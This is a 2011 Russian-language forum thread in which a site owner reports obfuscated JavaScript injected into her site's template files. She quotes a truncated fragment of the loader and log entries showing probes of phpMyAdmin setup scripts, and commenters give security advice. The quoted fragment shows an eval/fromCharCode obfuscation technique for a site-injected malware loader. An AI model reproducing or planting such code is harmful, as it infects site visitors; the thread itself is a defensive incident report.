Вредоносный код.

Главные вкладки

Аватар пользователя orel orel 29 сентября 2011 в 21:09

28 сентября на сайтах (они на одном аккаунте) обнаружила чужой код — в теге script

b=new function(){return 2;};if(!+b)String.prototype.
test='h'+'arC';for(i in $='b4h3tbn34')if(i=='te'+'st')m=$[i]
;try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'
v'
+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}
d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd
='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+
"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)x=-1*(d-d
2);n=[-x+7,-x+7,-x+103,-x+100 и еще много цифр с -x+

Он был вставлен на всех файлах tpl.php и html

Несколько лет я уже сталкивалась с такой проблемой — в то время я хранила пароль от ftp в Total Commander, который категорически не рекомендуется для этих целей. С тех времен пользуюсь файлзиллой, которая, как говорят, более безопасна. Пересела на линукс (убунту) , который менее интересен хакерам по сравнению с виндусом.

Как происходил взлом (согласно записям в системном журнале) :

сентябрь 26, 2011 - 13:20 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 12:52 — http://www.rudolfnureyev.org/sqlmanager/scripts/setup.php
сентябрь 26, 2011 - 12:12 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 10:49 — http://www.rudolfnureyev.org/phpmyadm/scripts/setup.php
сентябрь 26, 2011 - 12:45 — http://www.rudolfnureyev.org/pma2005/scripts/setup.php
сентябрь 27, 2011 - 15:27 — http://www.rudolfnureyev.org/j81t0i777m.zip

Пароль от аккаунта поменяла. Регистрацию новых пользователей без разрешения админа запретила.

Что делать, если я снова обнаружу подобные сообщения? Менять пароль? В этом все дело?

Комментарии

Аватар пользователя thezoom thezoom 29 сентября 2011 в 21:44

При заходе на http://www.rudolfnureyev.org/from_authors/ выдает:

"Внимание! Обнаружена проблема!
www.rudolfnureyev.org содержит материалы сайта c.cc-google-analytics.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта."

Аватар пользователя Айдар Айдар 29 сентября 2011 в 21:59

Странно, у меня Винда, ТК для ftp и практически ежедневно проскакивают подобные запросы к сайту, но пока ничего не обнаружил.

Плюс комп периодически (раз в недельку) славливает эксплойты и трояны.

Аватар пользователя romsla romsla 29 сентября 2011 в 23:58

"Айдар" wrote:
Странно, у меня Винда, ТК для ftp и практически ежедневно проскакивают подобные запросы к сайту, но пока ничего не обнаружил.

Это запросы к установочным скриптам таких служб как phpmyadmin, если хостер их удалил после установки - уязвимости нет.

Аватар пользователя direqtor direqtor 30 сентября 2011 в 5:52

Если под виндами ходите, антивирус в первую очередь. Сохраненные пароли не очень безопасны. Еще можете словить кейлогер, который снимет ваш ввод прямо в TC, WinSCP или в Filezilla. Тут только антивирус спасет, да и то не всегда.

Попросите хостера сменить простой FTP на секьюрный протокол SFTP, SCP. Правда, придется отказаться от TC.

Загляните на страницу управления хостингом - если хостер применяет для входа в неё HTTP - нахрен с пляжу такого осла, ваш пароль можно поймать в открытом виде на любом хосте через которые идет пакет.

Если панель управления хостингом самописная, стоит тоже подумать о смене хостера.

Аватар пользователя Айдар Айдар 30 сентября 2011 в 9:18

У меня нет антивира вапче, вернее фаервола - пользую только Gmer и Cureit раз в неделю-две. Сколько ни юзал антивирей, понял, что самый лучший из них - собственная голова.
А пароли не ввожу - они сохранены в браузере.

Romsla, direqtor, Спасибо за инфу!